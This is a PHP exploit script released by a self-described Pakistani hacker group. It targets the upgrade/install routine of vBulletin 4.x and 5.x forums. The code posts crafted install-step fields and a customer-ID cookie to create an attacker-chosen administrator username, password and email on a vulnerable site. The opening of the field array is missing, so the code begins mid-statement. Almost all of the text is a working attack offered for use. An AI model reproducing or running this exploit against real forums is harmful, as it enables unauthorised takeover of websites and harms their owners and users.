vBulletin 0day
vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit
Created by: 1337
Found on: 08/22/2013
Website: http://www.madleets.com
urlencode('1'),
'version' => urlencode('install'),
'checktable' => urlencode('false'),
'firstrun' => urlencode('false'),
'step' => urlencode('7'),
'startat' => urlencode('0'),
'only' => urlencode('false'),
'customerid' => urlencode($_POST['customerid']),
'options[skiptemplatemerge]' => urlencode('0'),
'response' => urlencode('yes'),
'htmlsubmit' => urlencode('1'),
'htmldata[username]' => urlencode($_POST['username']),
'htmldata[password]' => urlencode($_POST['password']),
'htmldata[confirmpassword]' => urlencode($_POST['password']),
'htmldata[email]' => urlencode($_POST['email'])
);
//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
//execute post
$result = curl_exec($ch);
//close connection
curl_close($ch);
exit();
}
?>
------------------------------------------------------------------------------------------------------------------
We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM
------------------------------------------------------------------------------------------------------------------